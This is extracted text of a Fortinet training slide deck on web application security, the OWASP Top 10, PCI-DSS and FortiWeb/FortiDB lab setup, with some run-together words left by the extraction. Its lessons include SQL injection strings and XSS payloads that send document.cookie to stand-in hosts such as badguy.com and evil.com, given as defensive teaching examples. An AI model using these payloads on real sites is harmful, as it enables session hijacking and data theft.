latam mx fortiweb fortidb training-v1.1
TRANSCRIPT
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
1/362
LATAM SE TEAM
FortiWeb and FortiDB
Training
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
2/362
Introduction to Web Application Security1
Database Vulnerabilities & Miss Configurations2
Owasp Top 10 and PCI-DSS3
Lab Installation and Setup4
Introduction to FortiWeb5
How to PoC FortiWeb6
FortiWeb Basic & Advanced Troubleshooting7
Introduction to FortiDB7
How to PoC FortiDB8
FortiDB Basic & Advanced Troubleshooting9
AGENDA
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
3/362
Introduction to Web
Applications
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
4/362
Internet
What are Web Applications ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
5/362
What are Web Applications ?
What are web applications? Web applications are public and internet facing
applications
Accessed using a standard browser and providewebmail, online retail sales, online auctions,wikis and many other functions
They provide major e-commerce and business
driving tools for organizations
Web apps are written for efficient deliveryof content
In most cases web apps are notdeveloped with security in mind
Leaves apps open to exploit
Potential exposure of sensitive information
Attacks can range from simple defacementto identity theft, credit card and other PII theft
Web server data center
Database Servers
Front End Web Servers
Data Center Perimeter
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
6/362
Web Applications Advantages
A Standard Web Browser actsas the Application Client
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
7/362
Creates a virtual hyperspace Beyond geographical constraints
Break computer hardware and software obstacles
Bring the whole world together
A low cost way to Share, maintain, and distribute Information
Intranet
Electronic commerce
Customer support
Web Applications Advantages
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
8/362
Client (front end):
Presents an interface to the user
Gathers information from the user, submits it to a server, then
receives, formats, and presents the results returned from the
server
User needs a specific software to access data on the Server (anda Specific Operating System, etc.)
The client connects to the server using specific ports
So, what are Client / Server Applications ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
9/362
Server (back end): A database from which a client requests information
Fulfills a request for information by managing the request or
serving the requested information to the client
Responsible for data storage and management
Only allowed users can only retrieve data from server (Firewall
policies, access control, etc.)
So, what are Client / Server Applications ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
10/362
Adversaries have fewer obstacles when performing an attack
An infrastructure attack presents all the following obstacles:
A web application attack presents fewer obstacles and elements
Why those differences are important ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
11/362
HTTP is a networking protocol, foundation of the WorldWide Web.
HTTP functions as request/response protocol
HTTP defines nine methods
The methods GET and POST are the most widely used
GET Method: Requests a representation of the specifiedresource. Data is included in the URL requested:
GET http://www.xbank.com/get.html?uid=xxx HTTP/1.1
POST Method: Submits data to be processed to theidentified resource. Data is included in the message body
POST /login.php?username=User1&password=pass1 HTTP/1.1
Some Web Application Concepts
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
12/362
HTML documents are usually static But Web Applications need dynamic documents
Search results
Database access
Context sensitive reply
Client side / Server Side execution Server-side Action occurs at the server
Server runs a set of instructions and return values to the
browser Client-side Action occurs on the client side (browser)
The instructions are executed on users computer
Some Web Application Concepts
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
13/362
Client side scripts are embedded inside HTML document.They are interpreted by browser.
When Web browser encounters a script, it calls ascripting interpreter, which parses and deciphers thescripting code.
Provide response to questions and queries withoutinterventions from the server Validate user data
Calculate expressions
Link to other applications
Client Side Scripting
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
14/362
Goal:
Render and present content
to the user
Software:Browsers (IE, Safari, Firefox,
etc.)
Language:
HTML/JavaScript, etc.
Client Side / Application Layer
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
15/362
Allows creation of dynamic web pages Modifies HTML code on the server before sent to client
Uses databases such as Access and Oracle
Responds to user input
Server Side Scripting
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
16/362
Goal:Receive user requests,
validate, process and convert
them in database requests
Software:Web Servers (Apache/IIS),
Application Servers (Tomcat,
WebSphere)
Language:Java/ASP/PHP
Server Side / Application Layer
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
17/362
Goal:
Store and manage access
to data.
Software:DBMS (Oracle, MS SQL
Server, MySQL, etc)
Language:
SQL
Database / Data Layer
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
18/362
Input that requires validation HTTP parameters HTTP headers
Database/filesystem input
Configuration
Output that requires encoding HTML / CSS / Javascript / XML / Images
Common Web Application Problems
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
19/362
Web Application
Security
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
20/362
Are your Web Applications Secure ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
21/362
Injection attacks trick an application into includingunintended commands in the data send to aninterpreter.
Interpreters Interpret strings as commands.
Ex: SQL, LDAP, XPath
Key Idea
Input data from the application is executed as code by theinterpreter
SQL Injections
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
22/362
1. App sends form to user
2. Attacker submits form withSQL exploit data
3. Application builds string withexploit data
4. Application sends SQL queryto DB
5. DB executes query, includingexploit, sends data back toapplication
6. Application returns data touser.
Web Server
Attacker
DB Server
Firewall
User
Pass or 1=1--
Form
SQL Injections
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
23/362
Unauthorized Access Attempt:
password = or 1=1 --
SQL statement becomes:
select count(*) from users where username = userand password= or 1=1 --
Checks if password is empty OR 1=1, which is always true,
permitting access.
SQL Injection Attack # 1
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
24/362
Database Modification Attack:
password = foo; delete from tableusers
whereusernamelike%
DB executes twoSQL statements:select count(*) from users where username = userand
password = foo
delete from tableuserswhereusernamelike%
SQL Injection Attack # 2
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
25/362
Exploits of a MOM
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
26/362
Cross Site Scripting (XSS) is a type of exploit where informationfrom one context, where it is not trusted, can be inserted intoanother context, where it is
The trusted website is used to store, transport, or deliver maliciouscontent to the victim
The target is to trick the client browser to execute maliciousscripting commands
JavaScript, VBScript, ActiveX, HTML, or Flash
Caused by insufficient input validation
Cross Site Scripting
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
27/362
Steal cookies Hijack of users session
Unauthorized access
Modify content of the web page Inserting words or images
Misinform
Bad reputation
Spy on what you do
Network Mapping
XSS viruses
Cross Site Scripting can
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
28/362
Send e-mail with tags embedded in
the link.
Follows link and the script executes
1
2
http://mybank.com/
account.php?variable=>document.lo
cation=http://www.badguy.com/cgi-bin/
cookie.cgi%20+document.cookie
www.badguy.com
Cookie collector
Malicious content dose not get stored in the server
The server bounces the original input to the victim without modification
Cross Site Scripting - Reflected
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
29/362
Upload malicious scripting commands to
the public forum
Browse
Downlaod
maliciouscode
Public forum web site
Attacker
Victim
1
2 3
Great message!
var img=new Image();img.src=
"http://www.bad.com/CookieStealer/
Form1.aspx?s= "+document.cookie;
The server stores the malicious contentThe server serves the malicious content in its original form
Cross Site Scripting - Persistent
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
30/362
Cross-site request forgery, also known as a one-clickattack or session riding, is a type of malicious exploit of awebsite whereby unauthorized commands are transmittedfrom a user that the website trusts.
Unlike cross-site scripting (XSS), which exploits the trusta user has for a particular site, CSRF exploits the trustthat a site has in a user's browser.
Cross Site Request Forgery
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
31/362
Cross Site Request Forgery
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
32/362
Cross Site Request Forgery
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
33/362
Samy Kamkars JS worm from 2005 Payload
but most of all, Samy is my hero
Exponential growth
7 hours, ~200 infected 12 hours, ~10K infected
17 hours, >1M infected
MySpace shuts down
Case Study: MySpace Samy Worm
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
34/362
Encoded javascript inside Disguised as java script
Bypassed security using
eval(document.body.inne + rHTML)
Case Study: MySpace Samy Worm
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
35/362
MySpace implement blacklist Blacklist many tags, but not , , and some
others. So:
Blacklist the word javascript. So:
Blacklist innerHTML. document.body.innerHTML
gives page source. So:alert(eval('document.body.inne' + 'rHTML')
Case Study: MySpace Samy Worm
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
36/362
DATA
64% of 10M ofsecurity incidents hadport 80 as entrypoints
Some Reflections
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
37/362
Database Vulnerabilities and
Miss Configurations
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
38/362
What about the Database ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
39/362
RSA Proprietary information about RSA'sSecurID authentication tokens. (2011)
Sony -PlayStation Network customers
More than 100 million customer accountdetails and 12 million unencrypted credit
card numbers. (2011)
HBGary Federal
60,000 confidential emails, executivesocial media accounts, and customerinformation.(2011)
Epsilon
E-mail databases from 2 percent of thefirm's 2,500 corporate clients. (2011)
June 7, 2011RSA Faces Angry Users After BreachThe nations biggest banks and large technology companies like SAP rushedTuesday to accept RSA Securitys offer to replace their ubiquitous SecurID tokensas many computer security experts voiced frustration with the company.
Tue Apr 26, 2011Sony suffered a massive breach in its video game online network that led to the
theft of names, addresses and possibly credit card data belonging to 77 millionuser accounts in what is one of the largest-ever Internet security break-ins.
2011-03-01The embattled CEO of HBGary Federal has resigned his post three weeks afterAnonmyous hacked into the companys network and stole thousands of e-mailmessages.
April 02, 2011Major Breach at Epsilon, the World's Largest Permission Based Email MarketingServices Company, Affects Wide Range of Major Brands - List Continues to Grow
Database Heist
http://www.reuters.com/news/videohttp://www.reuters.com/news/video -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
40/362
Common DB Vulnerabilities / Miss Configurations
Default, blank, and weak username/password
Removing default, blank and weak log-in credentials is aimportant first step for filling chinks in your database armor.
The bad guys are keeping track of default accounts, and they'lluse them when they can.
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
41/362
Common DB Vulnerabilities / Miss Configurations
Extensive user and group privileges
Privileges have not to be given to users who will eventually collectthem like janitors collect keys on their keychains.
Make users part of groups or roles and administering the rights
through those roles, which can be managed collectively moreeasily than if users were assigned direct rights.
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
42/362
Common DB Vulnerabilities / Miss Configurations
Unnecessarily enabled database features
Database installation comes with add-on packages of all shapesand sizes that are mostly going to go unused by any oneorganization.
Database security is about reducing attack surfaces. Disable oruninstall those unused packages.
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
43/362
Common DB Vulnerabilities / Miss Configurations
Broken configuration management
Databases have many different configuration choices andconsiderations available to DBAs to fine-tune performance andenhanced functionalities.
Unsafe configurations could be enabled by default or turned on forconvenience of DBAs or application developers.
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
44/362
Common DB Vulnerabilities / Miss Configurations
Denial of Service / Buffer overflows
Buffer overflow are exploited by flooding input sources with farmore characters than an application was expecting (like adding100 characters into an input box asking for a SSN)
Database vendors have worked hard to fix the glitches that allowthese attacks to occur ( Thats why patching is so critical)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
45/362
Vertical /Gov. Regulation(s) High level requirements for databases
Finance GLBA, Basel II Activity monitoring/Audit of customer records andaccount information residing in databases
Healthcare HIPAA Motoring/Auditing access to patient data residing indatabases
Pharma. CFR part 11 Motoring/Auditing access to drug research data in
databasesStates CA law 1386 Motoring/Auditing access to PID data residing in
databases(for privacy of personal information)
Federal FISMA(NIST 800-53A)
Assessment and Implement various IT internal controlsfor Databases
Cross industry
Regulation/
High level requirements for databases
PCI PID data access monitoring in databases
SOX Auditing Financial database transactions to ensure integrity of financialstatements
Regulatory Environment
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
46/362
Securing Confidential Data
Social Security, Credit Card, Revenue numbersall held in databases and applications (ERP,CRM, SCM, custom applications)
Automation of Auditing and Compliance
Reporting for SOX, PCI and other regulations
Change Control
Keep track of all changes related to databasestructures (DDL) and users (DCL)
Virtualization
Support both virtualized and non-virtualizedenvironments
Efficient Deployment and Management
Low TCO
DB Activity and Monitory Requirements
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
47/362
OWASP Top 10
2010
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
48/362
1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security miss configuration
7. Insecure cryptographic storage
8. Failure to restrict URL access
9. Insufficient transport layer protection
10. Unvalidated redirects and forwards
OWASP Top 10 - 2010
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
49/362
Client Appl
DB
Shell
Pgm CPU
A1 - Injections
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
50/362
String query = "SELECT * FROM accnts WHERE ID='" +request.getParameter("id") +"'";
id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
id="foo"
SELECT * FROM accnts WHERE ID='foo';
A1 - Injections
A2 C Sit S i ti
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
51/362
Browser
Browser
Appl DB
A2 Cross Site Scripting
A2 C Sit S i ti
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
52/362
(String) page += "";
CC=123456789">window.location=http://evil.com?
x=document.cookie
CC=123456789"
A2 Cross Site Scripting
A3 B k A th ti ti
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
53/362
Unpredictable passwords, sessions-ID, security-questions
No sessions-id/credentials i URL
Avoid session-fixation
Time out of sessions & logout buttons
Different sessions id outside/inside TLS No clear text passwords
A3 Broken Authentication
A4 I Di t Obj t R f
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
54/362
2010q12011q2
period=2011q3
period=2011q2
A4 Insecure Direct Object Reference
A5 C Sit S i ti
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
55/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
56/362
Patching
OS Application
Frameworks / libraries
Disable unnecessary services
Stack traces Configuration
A6 Security Miss Configurations
A7 I C t hi St
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
57/362
Keep track on sensitive data
Password one-way-hashed & salted Password/Key management
TLS key pass phrase
M2M lsenord (obfuscation)
A7 Insecure Cryptographic Storage
A8 F il t t i t URL
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
58/362
/user/getAccounts
/admin/getAccounts
A8 Failure to restrict URL access
A9 Insufficient Transport Layer Protection
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
59/362
Use SSL/TLS
No mixed content Use secure cookies
Example FireSheep exploits poor solutions
A9 Insufficient Transport Layer Protection
A10 Unvalidated Redirects and Forwards
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
60/362
http://www.vuln.com/redir.asp?=http://www.links.com
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
A10 Unvalidated Redirects and Forwards
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
61/362
PCI-DSS Application
Security Requirements
Web Application Security and PCI
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
62/362
Requirement 6Develop and maintain secure systemsand applications Patching
Configuration
Development lifecycle
Testing
Production
Web Application Security and PCI
Sub requirement 6 3
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
63/362
Develop software applications based on industry best practices andincorporate information security throughout the software developmentlife cycle.
6.3.1 Testing of all security patches
6.3.2 Separate development, test, and production environments
6.3.3 Separation of duties between development, test, andproduction
6.3.4 Live PANs are not used for testing or development
6.3.5 Removal of test data and accounts before production
6.3.6 Removal of custom application accounts, usernames, and
passwords 6.3.7 Review of custom code prior to release to production or
customers
Sub-requirement 6.3
Sub requirement 6 3
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
64/362
Develop all web applications based on secure coding guidelinessuch as the Open Web Application Security Project (OWASP)
guidelines. Review custom application code to identify codingvulnerabilities.
6.5.1 Unvalidated input
6.5.2 Broken access control (for example, malicious use of user IDs) 6.5.3 Broken authentication and session management (use of
account credentials and session cookies)
6.5.4 Cross-site scripting (XSS) attacks
6.5.5 Buffer overflows 6.5.6 Injection flaws (for example, structured query language (SQL)
injection)
6.5.7 Improper error handling 6.5.8 Insecure storage
6.5.9 Denial of service
6.5.10 Insecure configuration management
Sub-requirement 6.3
Sub requirement 6 6
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
65/362
Ensure that all web-facing applications are protectedagainst known attacks by applying either of the followingmethods: Having all custom application code reviewed for common
vulnerabilities by an organization that specializes in application
security Installing an application layer firewall in front of web-facing
applications.
Sub-requirement 6.6
Sub requirement 6 6 Clarifications
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
66/362
Application Firewall
= Web Application Firewall (WAF)Not an application-layer firewall
What makes a WAF acceptable for PCI?
Meet all applicable PCI DSS requirements React appropriately to threats
Inspect web application input and respond
Prevent data leakage
Enforce both positive and negative security models
Inspect Hypertext Markup Language (HTML), Dynamic HTML
(DHTML), and Cascading Style Sheets (CSS)
Sub-requirement 6.6 - Clarifications
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
67/362
Initial Lab Configuration
Lab Topology
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
68/362
Vmnet 1 Host-OnlyNetwork
Host Machine:2.2.2.1/24
VM Database & FortiDBIP: 2.2.2.20/24
Windows XPAdministrator/fortidb1!$FortiDBadmin/fortidb1!$
VM Web Server:
IP: 2.2.2.21/24Ubuntu 10xuser/xuser
FortiWeb:
IP: 2.2.2.15/24FortiWeb-VMadmin/(blank password)
Lab Topology
Preparing the VM Environment
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
69/362
From the USBs provided by Fortinet, download thecompressed VMs: FWB_VM64bit
HTTP_Server
DB_Server
And the FortiDB Installer FDB_X86
You will need: VMWare: Workstation 7/8/9
RAM: 4096 Mb
Hard Disk: 20 Gb
Hyper Threading enabled
Preparing the VM Environment
Customize VMWare Environment
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
70/362
Edit Network Interfaces
VMnet1 (Host only):
2.2.2.0/24
Customize VMWare Environment
Virtual Machines Connections
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
71/362
Go to VM > Settings
Edit Network Adapter (1)
Point it to VMNET 1
Set the IP addresses asshown in the diagram
Windows DB Server
Ubuntu HTTP Server
FortiWeb
The Host Machine
Virtual Machines Connections
FortiWeb Initial Configuration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
72/362
Press the Enter key once to get a new prompt, and log in using the
default FortiWeb-VM administrator name, admin.
No password for administrator, press Enter when prompted.
Use CLI to configure the
IP address of a virtual
interface (port1)config system interface
edit port1
set ip 2.2.2.15/24
End
FortiWeb Initial Configuration
Lab Flows
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
73/362
One-Arm HTTP Proxy Topology
Give us enough flexibility for ourLabs
SendTraffic through the FortiWeb
Host Machine:2.2.2.1/24
VM Database & FortiDBIP: 2.2.2.20/24
Windows XPAdministrator/fortidb1!$FortiDB 4.2.1admin/fortidb1!$
VM Web Server:
IP: 2.2.2.21/24Ubuntu 10xuser/xuser
FortiWeb:
IP: 2.2.2.15/24FortiWeb-VM build0414admin/(blank password)
Lab Flows
Lab Flows
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
74/362
This f lat network deployment not
recommended in a product ion
environm ent since a cl ient can
easi ly b ypass Fort iWeb
One-Arm HTTP Proxy Topology
Give us enough flexibility for ourLabs
SendTraffic straight to theWeb Server
Host Machine:2.2.2.1/24
VM Database & FortiDBIP: 2.2.2.20/24
Windows XPAdministrator/fortidb1!$FortiDB 4.2.1admin/fortidb1!$
VM Web Server:
IP: 2.2.2.21/24Ubuntu 10xuser/xuser
FortiWeb:
IP: 2.2.2.15/24FortiWeb-VM build0414admin/(blank password)
Lab Flows
Xbank Online Banking Application
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
75/362
Web Application:PHP/Apache
Database:MS SQL Server
Login URL:http://2.2.2.21/xbank/index.html
Login: hsimpson
Password: 1234
Xbank Online Banking Application
Xbank Navigation Flow
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
76/362
index.htmlRedirect toindex.php?p=login.html
index.phpFrameset
login.htmlLogin Page
topFrame.htmlTop Frame
bottomFrame.htmlBottom Frame
verify_admin.phpAuthenticate customer
list_accounts.phpList customersassociated accounts
list_cards.phpList customersassociated cards
show_profile.phpShow customerinformation
show_transaction.phpShow transferinformation
save_profile.phpSave changedcustomer information
list_activity.phpList account activity
save_transaction.phpMake transfer
Xbank Navigation Flow
Xbank Database Diagram
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
77/362
XBANK_CUSTOMERcustomer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_addresscustomer_since
XBANK_ACCOUNTaccount_idaccount_numberaccount_typeaccount_balanceaccount_currencycustomer_id
branch_id
XBANK_ACCOUNT_CARDaccount_id
card_id
XBANK_ACTIVITY
activity_idaccount_idactivity_timestampactivity_typeactivity_amountactivity_status
XBANK_BRANCHbranch_idbranch_namebranch_address
XBANK_CARDcard_idcard_numbercard_type
card_cvdcard_expiration
Xbank Database Diagram
FortiWeb Servers Configuration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
78/362
Physical Server: This is the real HTTPserver (real IP address)
Virtual Server: This represent theHTTP server as its seen by external
network devices (similar to a Virtual IP)
Protected Server: Represents all IPaddresses, hostnames, or FQDN thatmight come in the Host field of theHTTP header
FortiWeb Servers Configuration
FortiWeb Servers Configuration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
79/362
A note about Protected Servers!
Its important in multi-homed
scenarios: Same Virtual IP
Same Physical IP Protected hosts allow to define different
policies for different sites.
Be careful with NATed environments
When accessed by IP address Host field value wont be the same as the
Virtual IP address
FortiWeb Servers Configuration
Physical Server Setup
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
80/362
1. Create a new PhysicalServer Object
2. Unique object name
3. Physical IP Address
ys ca Se e Setup
Virtual Server Setup
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
81/362
3. Virtual IP address
1. Create a new VirtualServer Object
2. Unique Object Name
4. Listening Interface
p
Protected Servers Setup
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
82/362
1. Define ProtectedServers
3. Default Action = Deny
4.Click OK to save
5. After saving click Create New
2. Unique Object Name
p
Protected Servers Setup (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
83/362
2. Accept HTTP Traffic with hostname
3. Click OK to save
1. Hostname used by client
p ( )
Protected Servers Setup (3)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
84/362
Final Results
p ( )
Create a Web Policy
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
85/362
1. Select Server Policy
2. Click Create New tocreate a new Server Policy
y
Create a Web Policy (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
86/362
Policies are the glue thatjoin Physical Servers,Virtual Servers,Protected Hosts andProtection Profiles.
What are we protecting
and how
1. Complete your policy asdefined in the left image
2. Leave other fields asdefault
3. Click OK to save
y ( )
Checking the Configuration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
87/362
1. Enter virtual IP and URL path to testHTTP Proxy Settings
g g
Checking the Configuration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
88/362
1. After accessing the XBANK application, check yourARP table
Windows: run arpa in a command window
Linux/Mac: run arpan in a terminal
2. Note the MAC addresses for the IP address of
your FortiWeb and your Virtual IP. Are the same?,why?
g g
Access using FQDN
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
89/362
1. Add an entry to your hosts table so
www.xbank.com is resolved with 2.2.2.50 (VirtualIP)
Windows: %WINDIR%\System32\drivers\etc\hosts
Linux\Mac: /etc/hosts
2. Ping www.xbank.com. Does it work?3. Access www.xbank.com using your browser. Does
it work?. Why?
4. Add a new entry in your protected server to accept
requests to www.xbank.com
Final Results
http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
90/362
Final Results
FortiDB Installation (1)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
91/362
Login to the your virtual machine with an administrator
account
Execute FortiDB installer and follow on screen
instructions
FortiDB Installation (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
92/362
FortiDB Installation (3)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
93/362
Select installation path or leave default: C:\FortiDB
FortiDB Installation (4)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
94/362
Select FortiDB internal repository. Use Derby in this case
FortiDB Installation (5)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
95/362
Leave communication ports by default
FortiDB Installation (6)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
96/362
FortiDB Installation (7)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
97/362
FortiDB Installation (8)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
98/362
FortiDB Installation (9)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
99/362
FortiDB Installation (10)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
100/362
Verify installation by logging in to FortiDB:
URL: http://2.2.2.20:9100/ UID: admin
PWD: fortidb1!$
FortiDB Initial Setup
http://2.2.2.20:9100/http://2.2.2.20:9100/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
101/362
FortiDB Initial SetupLAB
admin
fortidb1!$
Monitoring xbankapp_db
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
102/362
1. Navigate toTargets
2. Click Add
to specify a new
DB Target
Monitoring xbankapp_db (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
103/362
1. Fill requiredinformationaccording tothe values inthe figure
4. Test Connection 3. Save
2. Completecredentials
(sa/fortidb1!$)
5. Validate test result
Monitoring xbankapp_db (3)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
104/362
1. Navigate toMonitoring Management
2. Click on the database target
Monitoring xbankapp_db (4)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
105/362
2. Specify Trace Folder location
5. SavePath to Trace Folder:C:\Program Files\Microsoft SQL Server\MSSQL10.XTREME_DB\MSSQL\Log
3. Test
4. Validate Test Result
1. SelectCollection Method
Monitoring xbankapp_db (5)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
106/362
1. Go to Alert Policy Groups (Double Click)
2. Select Monitoring
Policy Groups
3. Save
Monitoring xbankapp_db (6)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
107/362
2. Click check box to enable all policies
1. Go to Alert Policies tab (Double Click)
3. Click Enable to save
Monitoring xbankapp_db (7)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
108/362
1. Navigate to General Tab
2. Select Start monitoring when FortiDB starts& Click the Start Monitoring Button
3. Save
Monitoring check
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
109/362
1. Navigate back to Monitoring Management
3.You should end up with a greenmonitoring status indicator
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
110/362
Introduction to
FortiWeb
What is Application Security ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
111/362
Application life-cycle focus: (Mitigatingcontrol)
Design Development
Deployment
Upgrade
Maintenance
Ideal but too late
Difficult
Lengthy
Expensive
Legacy apps?
Who has responsibility?
Proprietary Software
Off the Shelf
Cloud Offering Application controls focus:
(Compensating Control)
Mitigation of threats (technical / functional)
Web applications security policy
Application Security Needs New Approach
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
112/362
Network Firewall
IPS/Deep PacketInspection Firewalls
FortiWebWeb Application Firewall
Network firewalls detect network
attacks Inspect IP and port
IPS products detect knownsignatures only Signature evasion is possible
No protection of SSL traffic
No real HTTP understanding (headers,parameters, etc)
No application awareness
No user awareness
High rate of false positives
Only Web Application
Firewalls can detect andblock applicationattacks!
Network layer(OSI 1-3)
Application layer(OSI 4-7)
Introducing - FortiWeb Web Application Firewall
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
113/362
Web Application Firewall- WAFSecures web applications to help customers meet compliance requirements
Secures WebApplications
Scans and DetectsWeb Vulnerabilities
Optimizes ApplicationDelivery
Web Vulnerability ScannerScans, analyzes and detects web application vulnerabilities
Application DeliveryAssures availability and accelerates performance of critical web applications
WAF
FortiGuard Subscription Services
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
114/362
1
100+ threat research professionals
Eight global locations
Automated updates to Fortinet customers
